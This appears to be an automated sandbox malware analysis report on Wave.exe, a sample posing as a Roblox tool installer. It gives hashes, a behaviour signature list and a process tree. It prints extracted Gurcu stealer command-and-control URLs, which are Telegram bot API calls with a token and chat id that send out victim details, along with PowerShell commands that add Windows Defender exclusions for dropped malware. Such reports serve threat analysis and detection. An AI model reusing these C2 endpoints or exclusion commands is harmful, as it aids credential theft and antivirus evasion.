Analysis

  • max time kernel
    300s
  • max time network
    301s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240611-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04-07-2024 18:36

General

  • Target

    Wave.exe

  • Size

    8.7MB

  • MD5

    658cf2d0529f97f6f04bb78b151dc207

  • SHA1

    4af0fb55a3343f885f43af09bd11f235dcfded2d

  • SHA256

    85edeebdb49bff8eede6ecc42928d9b0f6d120b0e4a3a88fe59c9b7cb62b2cac

  • SHA512

    d2361c08291037d177cbe8b546cb65fbfc5361fe676114919edc69bbecc90b31dd37ef9ef41ceab00b560ee26e264eaa702eeb32bb9ff5659767a2c41b9a7dce

  • SSDEEP

    196608:WCpTIWsrEhW5hcePglVrOUv5JpkMZxShCZxD43eQpMqX:Wg89rEShcWgldrjwcZxD4OQeqX

Malware Config

Extracted

Family

gurcu

C2

https://api.telegram.org/bot7121631902:AAErn17xNWrdiucOEwhQIj8v6o5tvdffJT4/sendPhoto?chat_id=7391062786&caption=%E2%9D%95%20User%20connected%20%E2%9D%95%0A%E2%80%A2%20ID%3A%208f21045c62c00476fa1fad6a7d6fb9a03faa10e3%0A%E2%80%A2%20Comment%3A%20proliv%0A%0A%E2%80%A2%20User%20Name%3A%20Admin%0A%E2%80%A2%20PC%20Name%3A%20ENXQHETB%0A%E2%80%A2%20OS%20Info%3A%20Windows%2010%20Pro%0A%0A%E2%80%A2%20IP%3A%20194.110.13.70%0A%E2%80%A2%20GEO%3A%20GB%20%2F%20London%0A%0A%E2%80%A2%20Working%20Directory%3A%20C%3A%5CmswebFonthost%5Clsass.ex

https://api.telegram.org/bot7121631902:AAErn17xNWrdiucOEwhQIj8v6o5tvdffJT4/sendDocument?chat_id=7391062786&caption=%F0%9F%93%8E%20Log%20collected%20%F0%9F%93%8E%0A%E2%80%A2%20ID%3A%208f21045c62c00476fa1fad6a7d6fb9a03faa10e3%0A%0A%E2%80%A2%20Scanned%20Directories%3A%200%0A%E2%80%A2%20Elapsed%20Time%3A%2000%3A00%3A27.526563

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Gurcu, WhiteSnake

    Gurcu is a malware stealer written in C#.

  • Modifies WinLogon for persistence 2 TTPs 24 IoCs
  • Process spawned unexpected child process 64 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • DCRat payload 10 IoCs

    Detects payload of DCRat, commonly dropped by NSIS installers.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 20 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • .NET Reactor proctector 5 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 24 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 34 IoCs
  • Loads dropped DLL 42 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 12 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 48 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Checks for any installed AV software in registry 1 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 12 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 23 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Modifies data under HKEY_USERS 5 IoCs
  • Modifies registry class 36 IoCs
  • NTFS ADS 1 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 64 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 4 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 62 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\Wave.exe
    "C:\Users\Admin\AppData\Local\Temp\Wave.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2360
    • C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe
      "C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:3748
      • C:\Users\Admin\AppData\Local\Wave\WaveBootstrapper.exe
        "C:\Users\Admin\AppData\Local\Wave\WaveBootstrapper.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Loads dropped DLL
        PID:1668
        • C:\Users\Admin\AppData\Local\Wave\WaveWindows.exe
          "C:\Users\Admin\AppData\Local\Wave\WaveWindows.exe"
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Loads dropped DLL
          • Checks for any installed AV software in registry
          PID:3572
          • C:\Users\Admin\AppData\Local\CefSharp\CefSharp.BrowserSubprocess.exe
            "C:\Users\Admin\AppData\Local\CefSharp\CefSharp.BrowserSubprocess.exe" --type=gpu-process --no-sandbox --locales-dir-path="C:\Users\Admin\AppData\Local\CefSharp\locales" --resources-dir-path="C:\Users\Admin\AppData\Local\CefSharp" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CefSharp" --cefsharpexitsub --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2168,i,5976260435413181007,3991880891142217743,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI --variations-seed-version --enable-logging=handle --log-file=2240 --mojo-platform-channel-handle=2160 /prefetch:2 --host-process-id=3572
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            PID:5844
          • C:\Users\Admin\AppData\Local\Luau Language Server\node.exe
            "C:\Users\Admin\AppData\Local\Luau Language Server\node.exe" server --process-id=3572
            5⤵
            • Executes dropped EXE
            PID:5752
          • C:\Users\Admin\AppData\Local\CefSharp\CefSharp.BrowserSubprocess.exe
            "C:\Users\Admin\AppData\Local\CefSharp\CefSharp.BrowserSubprocess.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --locales-dir-path="C:\Users\Admin\AppData\Local\CefSharp\locales" --resources-dir-path="C:\Users\Admin\AppData\Local\CefSharp" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CefSharp" --cefsharpexitsub --field-trial-handle=2788,i,5976260435413181007,3991880891142217743,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI --variations-seed-version --enable-logging=handle --log-file=2792 --mojo-platform-channel-handle=2784 /prefetch:3 --host-process-id=3572
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            PID:4728
          • C:\Users\Admin\AppData\Local\Bloxstrap\Bloxstrap.exe
            "C:\Users\Admin\AppData\Local\Bloxstrap\Bloxstrap.exe"
            5⤵
            • Checks computer location settings
            • Executes dropped EXE
            PID:6588
    • C:\Users\Admin\AppData\Local\Temp\SolaraBoostrapper.exe
      "C:\Users\Admin\AppData\Local\Temp\SolaraBoostrapper.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:4504
      • C:\Users\Admin\AppData\Local\Temp\Jopasobaki.exe
        "C:\Users\Admin\AppData\Local\Temp\Jopasobaki.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:2584
        • C:\Users\Admin\AppData\Local\Temp\Result.exe
          "C:\Users\Admin\AppData\Local\Temp\Result.exe"
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:2204
          • C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
            "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
            5⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4996
            • C:\Windows\SysWOW64\msiexec.exe
              "msiexec" /i "C:\Users\Admin\AppData\Local\Temp\node-v18.16.0-x64.msi" /qn
              6⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:5076
            • C:\Users\Admin\AppData\Local\Temp\vc_redist.x64.exe
              "C:\Users\Admin\AppData\Local\Temp\vc_redist.x64.exe" /install /quiet /norestart
              6⤵
              • Executes dropped EXE
              PID:2732
              • C:\Windows\Temp\{CF296A51-3F78-4821-879A-BC8BD299999B}\.cr\vc_redist.x64.exe
                "C:\Windows\Temp\{CF296A51-3F78-4821-879A-BC8BD299999B}\.cr\vc_redist.x64.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\vc_redist.x64.exe" -burn.filehandle.attached=540 -burn.filehandle.self=688 /install /quiet /norestart
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                PID:1948
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/pizzaboxer/bloxstrap/releases/download/v2.5.4/Bloxstrap-v2.5.4.exe
              6⤵
              • Enumerates system info in registry
              • NTFS ADS
              • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              PID:4804
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x10c,0x110,0x114,0xe8,0x118,0x7fffc5db46f8,0x7fffc5db4708,0x7fffc5db4718
                7⤵
                  PID:984
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2012,7201031802672848287,14298752686855762909,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2104 /prefetch:2
                  7⤵
                    PID:5252
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2012,7201031802672848287,14298752686855762909,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2216 /prefetch:3
                    7⤵
                      PID:2928
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2012,7201031802672848287,14298752686855762909,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2808 /prefetch:8
                      7⤵
                        PID:4560
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,7201031802672848287,14298752686855762909,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1
                        7⤵
                          PID:2128
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,7201031802672848287,14298752686855762909,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:1
                          7⤵
                            PID:2600
                          • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2012,7201031802672848287,14298752686855762909,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5560 /prefetch:8
                            7⤵
                              PID:5388
                            • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2012,7201031802672848287,14298752686855762909,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5560 /prefetch:8
                              7⤵
                                PID:752
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2012,7201031802672848287,14298752686855762909,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4840 /prefetch:8
                                7⤵
                                  PID:4032
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,7201031802672848287,14298752686855762909,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4856 /prefetch:1
                                  7⤵
                                    PID:1916
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2012,7201031802672848287,14298752686855762909,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5912 /prefetch:8
                                    7⤵
                                      PID:1984
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,7201031802672848287,14298752686855762909,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5900 /prefetch:1
                                      7⤵
                                        PID:5712
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,7201031802672848287,14298752686855762909,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6032 /prefetch:1
                                        7⤵
                                          PID:3840
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,7201031802672848287,14298752686855762909,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5884 /prefetch:1
                                          7⤵
                                            PID:936
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,7201031802672848287,14298752686855762909,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5624 /prefetch:1
                                            7⤵
                                              PID:3720
                                          • C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe
                                            "C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe"
                                            6⤵
                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                            • Checks BIOS information in registry
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            • Checks whether UAC is enabled
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            PID:1572
                                            • C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.92\msedgewebview2.exe
                                              "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.92\msedgewebview2.exe" --embedded-browser-webview=1 --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --noerrdialogs --embedded-browser-webview-dpi-awareness=1 --enable-features=MojoIpcz --mojo-named-platform-channel-pipe=1572.636.4458247572962455254
                                              7⤵
                                              • Enumerates system info in registry
                                              • Modifies data under HKEY_USERS
                                              • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                              PID:5904
                                              • C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.92\msedgewebview2.exe
                                                "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.92\msedgewebview2.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Crashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=125.0.6422.142 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.92\msedgewebview2.exe" --annotation=plat=Win64 "--annotation=prod=Edge WebView2" --annotation=ver=125.0.2535.92 --initial-client-data=0x15c,0x160,0x164,0x138,0x16c,0x7fff930e4ef8,0x7fff930e4f04,0x7fff930e4f10
                                                8⤵
                                                  PID:3188
                                                • C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.92\msedgewebview2.exe
                                                  "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.92\msedgewebview2.exe" --type=gpu-process --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1784,i,4953623939873439277,1784699755344951059,262144 --enable-features=MojoIpcz --variations-seed-version --mojo-platform-channel-handle=1768 /prefetch:2
                                                  8⤵
                                                    PID:1196
                                                  • C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.92\msedgewebview2.exe
                                                    "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.92\msedgewebview2.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --field-trial-handle=2020,i,4953623939873439277,1784699755344951059,262144 --enable-features=MojoIpcz --variations-seed-version --mojo-platform-channel-handle=2032 /prefetch:3
                                                    8⤵
                                                      PID:6092
                                                    • C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.92\msedgewebview2.exe
                                                      "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.92\msedgewebview2.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --field-trial-handle=2280,i,4953623939873439277,1784699755344951059,262144 --enable-features=MojoIpcz --variations-seed-version --mojo-platform-channel-handle=2292 /prefetch:8
                                                      8⤵
                                                        PID:5708
                                                      • C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.92\msedgewebview2.exe
                                                        "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.92\msedgewebview2.exe" --type=renderer --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc --ms-user-locale=" --field-trial-handle=3624,i,4953623939873439277,1784699755344951059,262144 --enable-features=MojoIpcz --variations-seed-version --mojo-platform-channel-handle=3668 /prefetch:1
                                                        8⤵
                                                          PID:3692
                                                  • C:\Users\Admin\AppData\Local\Temp\solara.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\solara.exe"
                                                    5⤵
                                                    • Checks computer location settings
                                                    • Executes dropped EXE
                                                    • Modifies registry class
                                                    • Suspicious use of WriteProcessMemory
                                                    PID:2716
                                                    • C:\Windows\SysWOW64\WScript.exe
                                                      "C:\Windows\System32\WScript.exe" "C:\Surrogateprovidercomponentsessionmonitor\oIWytMk.vbe"
                                                      6⤵
                                                      • Checks computer location settings
                                                      • Suspicious use of WriteProcessMemory
                                                      PID:3884
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c ""C:\Surrogateprovidercomponentsessionmonitor\GPEuaUZk.bat" "
                                                        7⤵
                                                        • Suspicious use of WriteProcessMemory
                                                        PID:924
                                                        • C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe
                                                          "C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe"
                                                          8⤵
                                                          • Modifies WinLogon for persistence
                                                          • Checks computer location settings
                                                          • Executes dropped EXE
                                                          • Adds Run key to start application
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          • Suspicious use of WriteProcessMemory
                                                          PID:380
                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe'
                                                            9⤵
                                                            • Command and Scripting Interpreter: PowerShell
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:700
                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Surrogateprovidercomponentsessionmonitor\SppExtComObj.exe'
                                                            9⤵
                                                            • Command and Scripting Interpreter: PowerShell
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:2292
                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\mswebFonthost\explorer.exe'
                                                            9⤵
                                                            • Command and Scripting Interpreter: PowerShell
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:4068
                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Multimedia Platform\RuntimeBroker.exe'
                                                            9⤵
                                                            • Command and Scripting Interpreter: PowerShell
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:4808
                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Sidebar\Gadgets\csrss.exe'
                                                            9⤵
                                                            • Command and Scripting Interpreter: PowerShell
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:4008
                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providerWebFont\backgroundTaskHost.exe'
                                                            9⤵
                                                            • Command and Scripting Interpreter: PowerShell
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:4456
                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\mswebFonthost\RuntimeBroker.exe'
                                                            9⤵
                                                            • Command and Scripting Interpreter: PowerShell
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:2200
                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Google\sppsvc.exe'
                                                            9⤵
                                                            • Command and Scripting Interpreter: PowerShell
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:1696
                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Saved Games\backgroundTaskHost.exe'
                                                            9⤵
                                                            • Command and Scripting Interpreter: PowerShell
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:688
                                                          • C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe
                                                            "C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe"
                                                            9⤵
                                                            • Modifies WinLogon for persistence
                                                            • Checks computer location settings
                                                            • Executes dropped EXE
                                                            • Adds Run key to start application
                                                            • Drops file in Windows directory
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:3548
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe'
                                                              10⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:4508
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Downloads\conhost.exe'
                                                              10⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:1008
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
